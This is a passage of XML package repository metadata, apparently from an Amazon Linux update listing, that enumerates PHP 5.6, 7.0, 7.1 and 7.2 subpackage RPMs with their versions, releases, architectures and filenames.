arch="i686"><filename>Packages/php56-pspell-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.38" 
release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package 
name="php71-odbc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.23" release="1.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-common-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" 
version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.23-1.34.amzn1.i686.rpm</filename></package><package 
name="php71-mbstring" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.23" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-bcmath-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.23" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-mcrypt-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.32" release="1.31.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package 
name="php70-tidy" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.32" release="1.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-xml-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.32" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-xml-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.32" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-json-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.32" 
release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.11" 
release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.11" release="1.6.amzn1" epoch="0" 